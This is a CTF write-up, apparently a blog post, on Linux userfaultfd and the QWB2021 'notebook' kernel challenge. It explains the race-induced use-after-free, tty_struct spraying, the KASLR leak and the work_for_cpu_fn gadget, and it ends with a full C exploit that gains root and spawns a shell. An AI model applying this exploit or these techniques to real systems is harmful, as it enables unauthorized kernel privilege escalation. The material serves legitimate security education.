Userfaultfd
2022-04-09 14:47:55

userfaultfd

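Introduction:

userfaultfd is a Linux mechanism that lets a user-space program handle page faults itself.

The program registers a memory range and supplies its own routine to service faults in that range.

Page fault: the accessed page is not present in RAM. For example, memory obtained with mmap is not actually backed by physical memory until it is first touched. The kernel normally resolves such faults with its own default handling, but a user can install a custom handler instead. Until that handler finishes, the thread that triggered the fault stays suspended at the faulting access.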

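Exploitation:

Example call:

copy_from_user(kptr,user_buf,size);

If user_buf is an mmap'ed region that has never been touched ==> the access triggers a page fault and copy_from_user is suspended ==>

while it is suspended, another thread frees kptr and gets a different object allocated in its place (for example a target structure such as tty_struct) ==>

once the fault has been handled, copy_from_user resumes ==> kptr now points at the tty_struct ==>

the user-controlled data is copied into the tty_struct, so its fields can be modified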

Registering userfaultfd:

void ErrExit(char* err_msg)
{
    puts(err_msg);
    exit(-1);
}

void RegisterUserfault(void *fault_page, void *(*handler)(void *))
{
    pthread_t thr;
    struct uffdio_api ua = {0};
    struct uffdio_register ur = {0};
    long uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd < 0)
        ErrExit("[-] userfaultfd");
    ua.api = UFFD_API;
    ua.features = 0;
    if (ioctl(uffd, UFFDIO_API, &ua) == -1)
        ErrExit("[-] ioctl-UFFDIO_API");

    ur.range.start = (unsigned long)fault_page; // the region we want to monitor
    ur.range.len   = PAGE_SIZE;
    ur.mode        = UFFDIO_REGISTER_MODE_MISSING;
    // Register for missing-page faults. When such a fault occurs the faulting
    // thread blocks, and we do our work from another thread in the meantime.
    if (ioctl(uffd, UFFDIO_REGISTER, &ur) == -1)
        ErrExit("[-] ioctl-UFFDIO_REGISTER");
    // Start a thread that receives the fault notification and handles it.
    int s = pthread_create(&thr, NULL, handler, (void *)uffd);
    if (s != 0)
        ErrExit("[-] pthread_create");
}

Usage:

RegisterUserfault(mmap_buf,handler)

==> binds handler to mmap_buf: when a page fault occurs in mmap_buf, handler is invoked to service it

Handler template:

void* userfaultfd_leak_handler(void* arg)
{
    struct uffd_msg msg;
    unsigned long uffd = (unsigned long) arg;
    struct pollfd pollfd;
    int nready;
    pollfd.fd = uffd;
    pollfd.events = POLLIN;
    nready = poll(&pollfd, 1, -1);

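A struct uffd_msg is declared to receive the fault message.

A struct pollfd is also needed:

fd is set to the userfaultfd descriptor passed in as arg

events is set to POLLIN

==> poll(&pollfd,1,-1) then blocks until a page fault is reported

==> Handling the fault:

    sleep(3); // stall this thread, which keeps the faulting thread blocked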
    if (nready != 1)
    {
        ErrExit("[-] Wrong poll return val");
    }
    nready = read(uffd, &msg, sizeof(msg));
    if (nready <= 0)
    {
        ErrExit("[-] msg err");
    }

    char* page = (char*) mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
    {
        ErrExit("[-] mmap err");
    }
    struct uffdio_copy uc;
    // init page
    memset(page, 0, PAGE_SIZE);
    uc.src = (unsigned long) page;
    uc.dst = (unsigned long) msg.arg.pagefault.address & ~(PAGE_SIZE - 1);
    uc.len = PAGE_SIZE;
    uc.mode = 0;
    uc.copy = 0;
    ioctl(uffd, UFFDIO_COPY, &uc);
    puts("[+] leak handler done");
    return NULL;
}

Example challenge:

QWB2021-notebook

Files provided by the challenge:

The boot script:

#!/bin/sh
stty intr ^]
exec timeout 300 qemu-system-x86_64 -m 64M -kernel bzImage -initrd rootfs.cpio -append "loglevel=3 console=ttyS0 oops=panic panic=1 kaslr" -nographic -net user -net nic -device e1000 -smp cores=2,threads=2 -cpu kvm64,+smep,+smap -monitor /dev/null 2>/dev/null -s

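Protections:

The boot script enables KASLR (kaslr on the kernel command line) as well as SMEP and SMAP (-cpu kvm64,+smep,+smap).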

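Background:

slab: one of the Linux kernel's memory allocation mechanisms

Read-write lock:

While the write lock is held, every other attempt to take the lock (read or write) blocks

While a read lock is held, attempts to take the write lock block (other readers can still acquire it)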

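A handy trick once a tty object is fully controlled, with no ROP needed:

https://zhuanlan.zhihu.com/p/385645268

A kernel function (work_for_cpu_fn):

After compilation:

The function is part of the workqueue implementation, so any kernel built with multi-core support (CONFIG_SMP) contains it.

Controlling the memory that the first argument points to is enough ==> this gives a call to an arbitrary function with one arbitrary argument ==>

the return value is stored back into the memory the first argument points to, and the gadget returns cleanly ==>

nothing has to be done about SMEP or SMAP along the way ==>

the kernel is full of read/write/ioctl style callbacks whose first argument happens to be the object itself ==>

privilege escalation ==> commit_creds(prepare_kernel_cred(0)) ==> only two such calls are needed

If something like SELinux also has to be disabled, a gadget that writes 0 to an arbitrary address is enough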
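To make the calling convention concrete, here is a user-space model of the gadget. It is only a sketch: struct gadget_obj, call_gadget and the two fake_* functions are hypothetical stand-ins, and the byte offsets 32, 40 and 48 are taken from the decompiled work_for_cpu_fn shown later in this post, assuming a 64-bit target.

```c
#include <stddef.h>
#include <stdint.h>

/* Stand-in for the object the gadget receives as its first argument.
 * Only the words at byte offsets 32, 40 and 48 matter to the gadget. */
struct gadget_obj {
    uint64_t pad[4];          /* offsets 0..31: not used by the gadget */
    uint64_t (*fn)(uint64_t); /* offset 32: function to call */
    uint64_t arg;             /* offset 40: its single argument */
    uint64_t ret;             /* offset 48: where the result is stored */
};

/* Model of the gadget: call obj->fn(obj->arg), store the result in obj. */
uint64_t call_gadget(struct gadget_obj *obj)
{
    obj->ret = obj->fn(obj->arg);
    return obj->ret;
}

/* Hypothetical stand-ins for prepare_kernel_cred and commit_creds. */
uint64_t fake_prepare(uint64_t arg)
{
    return arg == 0 ? 0x1234 : 0; /* pretend 0x1234 is the new cred */
}

uint64_t fake_commit(uint64_t cred)
{
    return cred == 0x1234 ? 0 : (uint64_t)-1; /* 0 means success */
}

/* Two gadget invocations chained through the stored return value. */
uint64_t chain_two_calls(void)
{
    struct gadget_obj obj = {0};

    obj.fn = fake_prepare;  /* first call: prepare(0) */
    obj.arg = 0;
    call_gadget(&obj);

    obj.fn = fake_commit;   /* second call: commit(result of the first) */
    obj.arg = obj.ret;
    return call_gadget(&obj);
}
```

The point of the model is the data flow: the result of the first call is read back from the object and written into the argument slot before the second call, which is why two invocations are enough.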

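Static analysis:

Both noteedit and noteadd take only the read lock:

noteadd:

copy_from_user is called before size is updated:

==> the thread can be stalled here, with size changed to 0x60

noteedit:

This function uses krealloc ==> with no limit on newsize

copy_from_user is also called before the note pointer is updated ==>

userfaultfd can stall the thread there, so the note pointer is never updated

notegift:

notegift leaks memory addresses directly ==> bypasses KASLR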

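Summary of primitives:

1. Slab objects of arbitrary size can be allocated ==>

add caps size at 0x60, but edit can krealloc a note to any size

2. A UAF on a slab object of arbitrary size can be created (only the first 0x60 bytes of its data can be controlled)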
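Which slab cache a request lands in depends on its size. The helper below is a rough sketch that assumes the usual general-purpose kmalloc caches on x86-64 (8 through 8192 bytes, including the 96 and 192 byte caches). The cache list is an assumption for illustration and is not taken from this challenge's kernel configuration.

```c
#include <stddef.h>

/* Returns the object size of the smallest assumed kmalloc cache that can
 * hold `size` bytes, or 0 if the request is larger than the last cache. */
size_t kmalloc_cache_size(size_t size)
{
    /* Assumed general-purpose cache sizes, in bytes. */
    static const size_t caches[] = {
        8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
    };
    size_t i;

    for (i = 0; i < sizeof(caches) / sizeof(caches[0]); i++) {
        if (size <= caches[i])
            return caches[i];
    }
    return 0;
}
```

Under that assumption a 0x60 byte note comes from kmalloc-96, while a note resized to 0x2e0 bytes comes from kmalloc-1024, the same cache that serves tty_struct.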

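Exploitation approach:
I.

1. Open /dev/ptmx many times. Each open calls, inside alloc_tty_struct:

tty = kzalloc(sizeof(*tty),GFP_KERNEL)

which allocates 0x2e0 bytes, served from kmalloc-1024

2. The kernel initializes the struct tty_operations pointer in the tty_struct to the global kernel variable ptm_unix98_ops ==>

its address/offset can be read from /proc/kallsyms

3. Then close the sprayed ptmx descriptors to free their tty_structs, and use noteedit to resize notes to 0x2e0 ==>

allocating several 0x2e0 notes reclaims the freed tty_structs ==>

reading ((uint64_t *)note)[3] and subtracting the known offset leaks the kernel base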
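The arithmetic behind that last step can be sketched as follows. The two constants are derived from the addresses hard-coded in the exploit at the end of this post (ptm_unix98_ops at 0xffffffffa228e440 with the kernel base at 0xffffffffa1400000, and the 0x120 adjustment applied when the low 12 bits of the leak are 0x320), so they only hold for this particular kernel build. The function names are made up for this illustration.

```c
#include <stdint.h>

/* Offset of ptm_unix98_ops from the kernel base, derived from the
 * addresses used in the exploit (valid for this kernel build only). */
#define PTM_UNIX98_OPS_OFF 0xe8e440ULL

/* Distance from pty_unix98_ops up to ptm_unix98_ops in this build. */
#define PTY_TO_PTM_DELTA 0x120ULL

/* The leaked ops pointer may belong to either end of the pty pair.
 * If its low 12 bits are 0x320 it is treated as pty_unix98_ops and
 * converted to the ptm_unix98_ops address. */
uint64_t normalize_ops_leak(uint64_t leaked)
{
    if ((leaked & 0xfff) == 0x320)
        return leaked + PTY_TO_PTM_DELTA;
    return leaked;
}

/* Kernel base = normalized ops address - its known offset. */
uint64_t kernel_base_from_leak(uint64_t leaked)
{
    return normalize_ops_leak(leaked) - PTM_UNIX98_OPS_OFF;
}
```

Because KASLR shifts the whole kernel image by a single slide, every other symbol address then follows by adding that symbol's own offset to the recovered base.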

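II.

1. If user_buf is set to a memory region that has never been touched, and the userfault handler never resolves the fault ==>

noteedit and noteadd stay stuck at copy_from_user forever

2. krealloc can also perform a free ==> combined with userfault this yields a UAF of arbitrary size

(the stalled thread never reaches the code after copy_from_user that updates the address stored in notelist)

3. Register a userfault on an untouched page. add and edit take only the read side of the read-write lock, not the exclusive write side ==> the two functions can run concurrently ==>

copy_from_user(name,user_buf,0x1000);

==> this copies from user_buf in user space

===> if user_buf is mmap'ed memory that has never been touched, a userfault is triggered ==> the thread blocks ==>

Fill notelist with 0x2e0 chunks, then start 0x10 edit threads and 0x10 add threads; the edit threads krealloc a note to a very large size

==> krealloc's kfree is triggered ==> the 0x2e0 chunk is freed ==>

the thread is now stuck in copy_from_user, so the address that noteedit should have updated is unchanged ==> UAF

===> spray many tty_structs so that the freed chunks are reused as tty_structs

===> use the add threads to set the chunk size recorded in notelist back to a normal value so that the __check_object_size check passes

4. Some notes in notelist now contain a tty_struct ===>

reading those notes returns the tty_struct's members ===> leaks the kernel base

(ptm_unix98_ops or pty_unix98_ops)

5. Forge a fake_tty_ops table in one of the notelist entries, with the ioctl pointer in the fake ops set to work_for_cpu_fn: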

__int64 __fastcall work_for_cpu_fn(_QWORD *a1)
{
  _QWORD *v1; // rbx
  __int64 (*v2)(void); // rax
  __int64 v3; // rdi
  __int64 result; // rax
 
  _fentry__(a1);
  v1 = a1;
  v2 = a1[4];                                   // a1+32
  v3 = a1[5];                                   // a1+40
  result = _x86_indirect_thunk_rax(v2);
  v1[6] = result;                               // a1+48
  return result;
}

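==> It calls the function pointer stored at a1+32 with the value stored at a1+40 as its argument, and stores the return value at a1+48 ==>

Combined with tty_struct ==> a1 points at the UAF'ed tty_struct in notelist, which we then forge ==>

the value at offset 32 is the function to call, the value at offset 40 is its argument, and the return value lands at offset 48 ==>

===> set this up for commit_creds(prepare_kernel_cred(0))

===> finally call ioctl on the tty ==> this triggers work_for_cpu_fn, which performs commit_creds(prepare_kernel_cred(0))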
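The buffer layout this requires can be written down as a small helper. This is a sketch that operates on plain user-space arrays: the word indices (0 for the first qword, 3 for the ops pointer, 12 for the ioctl slot) and the value 0x100005401 are the ones used by the exploit below, while the helper names are made up for this illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* First qword the exploit expects to see in, and writes back to,
 * the tty_struct. */
#define TTY_FIRST_QWORD 0x100005401ULL

/* Word (8-byte) indices inside the forged tty_struct. */
enum {
    TTY_W_FIRST = 0,
    TTY_W_OPS   = 3,      /* pointer to the tty_operations table */
    TTY_W_FN    = 32 / 8, /* function the gadget calls */
    TTY_W_ARG   = 40 / 8, /* argument passed to that function */
    TTY_W_RET   = 48 / 8  /* where the gadget stores the result */
};

/* Slot in the fake ops table that the exploit points at the gadget
 * so that ioctl() on the tty reaches it. */
#define OPS_W_IOCTL 12

/* Prepare the forged tty_struct for one gadget invocation. */
void stage_gadget_call(uint64_t *tty_words, uint64_t fake_ops_addr,
                       uint64_t fn_addr, uint64_t arg)
{
    tty_words[TTY_W_FIRST] = TTY_FIRST_QWORD;
    tty_words[TTY_W_OPS]   = fake_ops_addr;
    tty_words[TTY_W_FN]    = fn_addr;
    tty_words[TTY_W_ARG]   = arg;
}

/* Make the ioctl entry of the fake ops table point at the gadget. */
void point_ioctl_at_gadget(uint64_t *ops_words, uint64_t gadget_addr)
{
    ops_words[OPS_W_IOCTL] = gadget_addr;
}
```

In the exploit the staged words are written into note 0 (the UAF'ed tty_struct) and the fake ops table into note 1. After the first ioctl, the value at word TTY_W_RET is read back and staged as the argument of the second call. The exploit also fills ops slots 7 and 10 with the gadget address; only the ioctl slot is modeled here.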

exp:

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <syscall.h>
#include <poll.h>
#include <unistd.h>
#include <pthread.h>
#include <string.h>
#include <stdint.h>
#include <linux/userfaultfd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <assert.h>

#define PAGE_SIZE 0x1000
#define TTY_STRUCT_SZIE 0x2E0

size_t work_for_cpu_fn_off = 0xffffffff8949eb90 - 0xffffffff8a28e440;
size_t prepare_kernel_cred_off = 0xffffffffa14a9ef0 - 0xffffffffa228e440;
size_t commit_creds_off = 0xffffffffa14a9b40 - 0xffffffffa228e440;
size_t kernel_base;

struct userarg
{
    size_t idx;
    size_t size;
    void* buf;
};

int note_fd;
void* stuck_mapped_memory;

// register userfaultfd
void ErrExit(char* err_msg)
{
    puts(err_msg);
    exit(-1);
}

void RegisterUserfault(void *fault_page, void *(*handler)(void *))
{
    pthread_t thr;
    struct uffdio_api ua = {0};
    struct uffdio_register ur = {0};
    long uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd < 0)
        ErrExit("[-] userfaultfd");
    ua.api = UFFD_API;
    ua.features    = 0;
    if (ioctl(uffd, UFFDIO_API, &ua) == -1)
        ErrExit("[-] ioctl-UFFDIO_API");

    ur.range.start = (unsigned long)fault_page; // the region we want to monitor
    ur.range.len   = PAGE_SIZE;
    ur.mode        = UFFDIO_REGISTER_MODE_MISSING;
    // Register for missing-page faults. When such a fault occurs the faulting
    // thread blocks, and we do our work from another thread in the meantime.
    if (ioctl(uffd, UFFDIO_REGISTER, &ur) == -1)
        ErrExit("[-] ioctl-UFFDIO_REGISTER");
    // Start a thread that receives the fault notification and handles it.
    int s = pthread_create(&thr, NULL, handler, (void *)uffd);
    if (s != 0)
        ErrExit("[-] pthread_create");
}

void noteadd(size_t idx, size_t size, void* buf)
{
    struct userarg notearg;
    notearg.idx = idx;
    notearg.size = size;
    notearg.buf = buf;
    ioctl(note_fd, 0x100, &notearg);
}

void notegift(void* buf)
{
    struct userarg notearg;
    notearg.idx = 0;
    notearg.size = 0;
    notearg.buf = buf;
    ioctl(note_fd, 0x64, &notearg);
}

void notedel(size_t idx)
{
    struct userarg notearg;
    notearg.idx = idx;
    notearg.size = 0;
    notearg.buf = NULL;
    ioctl(note_fd, 0x200, &notearg);
}

void noteedit(size_t idx, size_t size, void* buf)
{
    struct userarg notearg;
    notearg.idx = idx;
    notearg.size = size;
    notearg.buf = buf;
    ioctl(note_fd, 0x300, &notearg);
}
// open the device
void OpenNote()
{
    note_fd = open("/dev/notebook", O_RDWR);
    if (note_fd < 0)
    {
        ErrExit("[-] err in open notebook device");
    }
}

void* userfaultfd_sleep3_handler(void* arg)
{
    struct uffd_msg msg;
    unsigned long uffd = (unsigned long) arg;
    puts("[+] sleep3 handler created");
    int nready;
    struct pollfd pollfd;
    pollfd.fd = uffd;
    pollfd.events = POLLIN;
    nready = poll(&pollfd, 1, -1);
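    // poll() parks this thread on the uffd's wait queue until a fault arrives
    puts("[+] sleep3 handler unblocked");
    sleep(3); // stall this thread, which keeps the faulting thread blocked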
    if (nready != 1)
    {
        ErrExit("[-] Wrong poll return val");
    }
    nready = read(uffd, &msg, sizeof(msg));
    if (nready <= 0)
    {
        ErrExit("[-] msg err");
    }

    char* page = (char*) mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
    {
        ErrExit("[-] mmap err");
    }
    struct uffdio_copy uc;
    // init page
    memset(page, 0, PAGE_SIZE);
    uc.src = (unsigned long) page;
    uc.dst = (unsigned long) msg.arg.pagefault.address & ~(PAGE_SIZE - 1);
    uc.len = PAGE_SIZE;
    uc.mode = 0;
    uc.copy = 0;
    ioctl(uffd, UFFDIO_COPY, &uc);
    puts("[+] sleep3 handler done");
    return NULL;
}

void* userfaultfd_stuck_handler(void* arg)
{
    struct uffd_msg msg;
    unsigned long uffd = (unsigned long) arg;
    puts("[+] stuck handler created");
    int nready;
    struct pollfd pollfd;
    pollfd.fd = uffd;
    pollfd.events = POLLIN;
    nready = poll(&pollfd, 1, -1);
    puts("[+] stuck handler unblocked");
    pause();
    if (nready != 1)
    {
        ErrExit("[-] Wrong poll return val");
    }
    nready = read(uffd, &msg, sizeof(msg));
    if (nready <= 0)
    {
        ErrExit("[-] msg err");
    }

    char* page = (char*) mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
    {
        ErrExit("[-] mmap err");
    }
    struct uffdio_copy uc;
    // init page
    memset(page, 0, PAGE_SIZE);
    uc.src = (unsigned long) page;
    uc.dst = (unsigned long) msg.arg.pagefault.address & ~(PAGE_SIZE - 1);
    uc.len = PAGE_SIZE;
    uc.mode = 0;
    uc.copy = 0;
    ioctl(uffd, UFFDIO_COPY, &uc);
    puts("[+] stuck handler done");
    return NULL;
}

void* edit_thread(void* arg)
{
    size_t idx = (size_t) arg; // note index passed through pthread_create
    puts("[+] edit thread start!");
    noteedit(idx, 0, stuck_mapped_memory);
    puts("[+] edit thread end!"); // won't reach here
    return NULL;
}

void* add_thread(void* arg)
{
    size_t idx = (size_t) arg; // note index passed through pthread_create
    puts("[+] add thread start!");
    noteadd(idx, 0x60, stuck_mapped_memory);
    puts("[+] add thread end!"); // won't reach here
    return NULL;
}

char buf_a[0x500] = {"aaa"};
size_t buf_tty[0x100], buf_fake_table[0x500];

int main()
{
    int pid;
    int tty_fd;

    stuck_mapped_memory = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    RegisterUserfault(stuck_mapped_memory, userfaultfd_stuck_handler);

    OpenNote();

    noteadd(0, 0x60, buf_a);
    noteadd(1, 0x60, buf_a);
    noteedit(1, 0x500, buf_a);
    noteedit(0, TTY_STRUCT_SZIE, buf_a);
    write(note_fd, buf_a, 0);


    pthread_t thr_edit, thr_add;
    pthread_create(&thr_edit, NULL, edit_thread, 0);
    sleep(1);
    pthread_create(&thr_add, NULL, add_thread, 0);
    sleep(1);
    puts("ready to open ptmx");
    for (int i = 0; i < 20; i++)
    {
        tty_fd = open("/dev/ptmx", O_RDWR);
        if (tty_fd < 0)
        {
            ErrExit("[-] ptmx open failed!");
        }
        read(note_fd, buf_tty, 0);
        if (buf_tty[0] == 0x100005401)
        {
            printf("[+] tty_struct found! fd = %d\n", tty_fd);
            break; // tty_struct used our slab
        }
    }
    if (buf_tty[0] != 0x100005401)
    {
        ErrExit("[-] leak failed");
    }

    size_t ptm_unix98_ops_addr = buf_tty[3];
    if ((ptm_unix98_ops_addr & 0xFFF) == 0x320) ptm_unix98_ops_addr += 0x120;
    size_t work_for_cpu_fn_addr =  work_for_cpu_fn_off + ptm_unix98_ops_addr;
    size_t tty_struct_addr = buf_tty[10] - 0x50;
    size_t commit_creds_addr = commit_creds_off + ptm_unix98_ops_addr;
    size_t prepare_kernel_cred_addr = prepare_kernel_cred_off + ptm_unix98_ops_addr;
    kernel_base = prepare_kernel_cred_addr - 0xA9EF0;

    printf("[+] ptm_unix98_ops addr leaked, addr: 0x%lx\n", ptm_unix98_ops_addr);
    printf("[+] work_for_cpu_fn addr leaked, addr: 0x%lx\n", work_for_cpu_fn_addr);
    printf("[+] prepare_kernel_cred addr leaked, addr: 0x%lx\n", prepare_kernel_cred_addr);
    printf("[+] tty_struct addr leaked, addr: 0x%lx\n", tty_struct_addr);

    size_t buf_gift[0x100];
    notegift(buf_gift);
    size_t note_0_addr = buf_gift[0 * 2];
    size_t note_1_addr = buf_gift[1 * 2];
    assert(note_0_addr == tty_struct_addr);
    printf("[+] note_1 addr leaked, addr: 0x%lx\n", note_1_addr);

    buf_tty[0] = 0x100005401;
    buf_tty[3] = note_1_addr;
    buf_tty[4] = prepare_kernel_cred_addr;
    buf_tty[5] = 0;
    write(note_fd, buf_tty, 0); // write to tty_struct

    buf_fake_table[7] = work_for_cpu_fn_addr;
    buf_fake_table[10] = work_for_cpu_fn_addr;
    buf_fake_table[12] = work_for_cpu_fn_addr;
    write(note_fd, buf_fake_table, 1);

    // write(tty_fd, buf_a, 1);
    ioctl(tty_fd, 233, 233);

    read(note_fd, buf_tty, 0);
    printf("[+] prepare_kernel_cred finished, return 0x%lx\n", buf_tty[6]);

    buf_tty[0] = 0x100005401;
    buf_tty[3] = note_1_addr;
    buf_tty[4] = commit_creds_addr;
    buf_tty[5] = buf_tty[6];
    write(note_fd, buf_tty, 0);
    sleep(1);

    // write(tty_fd, buf_a, 1);
    ioctl(tty_fd, 233, 233);

    printf("now uid = %d\n", getuid());

    if (getuid() == 0)
    {
        puts("[+] root now!");
        system("/bin/sh");
    }
    else
    {
        exit(-1);
    }

    return 0;
}

Result: